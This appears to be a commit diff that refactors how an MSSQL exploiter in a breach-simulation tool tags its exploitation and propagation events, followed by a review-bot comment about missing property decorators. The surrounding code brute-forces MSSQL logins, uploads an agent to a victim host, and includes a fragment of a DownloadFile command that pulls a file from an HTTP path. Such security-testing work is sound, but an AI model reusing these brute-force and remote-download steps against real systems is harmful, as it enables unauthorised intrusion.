Agent: Use exploit tag properties
parent
5c6b1e3910
commit
e404416363
|
@ -27,12 +27,6 @@ from infection_monkey.utils.threading import interruptible_iter
|
|||
logger = logging.getLogger(__name__)
|
||||
|
||||
MSSQL_EXPLOITER_TAG = "mssql-exploiter"
|
||||
EXPLOITER_TAGS = (MSSQL_EXPLOITER_TAG, T1110_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG)
|
||||
PROPAGATION_TAGS = (
|
||||
MSSQL_EXPLOITER_TAG,
|
||||
T1059_ATTACK_TECHNIQUE_TAG,
|
||||
T1105_ATTACK_TECHNIQUE_TAG,
|
||||
)
|
||||
|
||||
|
||||
class MSSQLExploiter(HostExploiter):
|
||||
|
@ -50,6 +44,12 @@ class MSSQLExploiter(HostExploiter):
|
|||
"DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')"
|
||||
)
|
||||
|
||||
def _exploiter_tags(self) -> Tuple[str, ...]:
|
||||
return (MSSQL_EXPLOITER_TAG, T1110_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG)
|
||||
|
||||
def _propagation_tags(self) -> Tuple[str, ...]:
|
||||
return (MSSQL_EXPLOITER_TAG, T1059_ATTACK_TECHNIQUE_TAG, T1105_ATTACK_TECHNIQUE_TAG)
|
||||
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.cursor = None
|
||||
|
@ -71,9 +71,7 @@ class MSSQLExploiter(HostExploiter):
|
|||
f" no credentials were successful"
|
||||
)
|
||||
logger.error(error_message)
|
||||
self._publish_exploitation_event(
|
||||
self.host.ip_addr, False, EXPLOITER_TAGS, error_message
|
||||
)
|
||||
self._publish_exploitation_event(False, error_message=error_message)
|
||||
return self.exploit_result
|
||||
|
||||
if self._is_interrupted():
|
||||
|
@ -90,14 +88,12 @@ class MSSQLExploiter(HostExploiter):
|
|||
)
|
||||
|
||||
logger.error(error_message)
|
||||
self._publish_propagation_event(
|
||||
self.host.ip_addr, False, PROPAGATION_TAGS, error_message
|
||||
)
|
||||
self._publish_propagation_event(success=False, error_message=error_message)
|
||||
self.exploit_result.error_message = error_message
|
||||
|
||||
return self.exploit_result
|
||||
|
||||
self._publish_propagation_event(self.host.ip_addr, True, PROPAGATION_TAGS)
|
||||
self._publish_propagation_event(success=True)
|
||||
self.exploit_result.propagation_success = True
|
||||
return self.exploit_result
|
||||
|
||||
|
@ -144,13 +140,13 @@ class MSSQLExploiter(HostExploiter):
|
|||
)
|
||||
self.exploit_result.exploitation_success = True
|
||||
self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT)
|
||||
self._report_login_attempt(True, host, user, password)
|
||||
self._report_login_attempt(True, user, password)
|
||||
cursor = conn.cursor()
|
||||
return cursor
|
||||
except pymssql.OperationalError as err:
|
||||
error_message = f"Connection to MSSQL failed: {err}"
|
||||
logger.info(error_message)
|
||||
self._report_login_attempt(False, host, user, password, error_message)
|
||||
self._report_login_attempt(False, user, password, error_message)
|
||||
# Combo didn't work, hopping to the next one
|
||||
pass
|
||||
|
||||
|
@ -162,10 +158,8 @@ class MSSQLExploiter(HostExploiter):
|
|||
"Bruteforce process failed on host: {0}".format(self.host.ip_addr)
|
||||
)
|
||||
|
||||
def _report_login_attempt(
|
||||
self, success: bool, host: str, user, password: str, message: str = ""
|
||||
):
|
||||
self._publish_exploitation_event(host, success, EXPLOITER_TAGS, error_message=message)
|
||||
def _report_login_attempt(self, success: bool, user, password: str, message: str = ""):
|
||||
self._publish_exploitation_event(success=success, error_message=message)
|
||||
self.report_login_attempt(success, user, password)
|
||||
|
||||
def _upload_agent(self, agent_path_on_victim: PureWindowsPath):
|
||||
|
|
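Review bot: The two tag accessors added in the second hunk, `_exploiter_tags` and `_propagation_tags`, are plain methods with no `@property` decorator, although the commit title calls them properties. The rewritten `_publish_exploitation_event(...)` and `_publish_propagation_event(...)` calls no longer pass a tag tuple, so tagging now depends entirely on how `HostExploiter` (not visible on this page) reads these members. If the base class accesses `self._exploiter_tags` as an attribute, it would receive a bound method instead of the tuple, and the T1110/T1210 and T1059/T1105 technique tags would be missing or malformed on published events. Presumably each `def` needs `@property` on the line above it; otherwise confirm that the base class calls them. A one-line docstring such as `"""Tags attached to every exploitation event this exploiter publishes."""` would also record the contract.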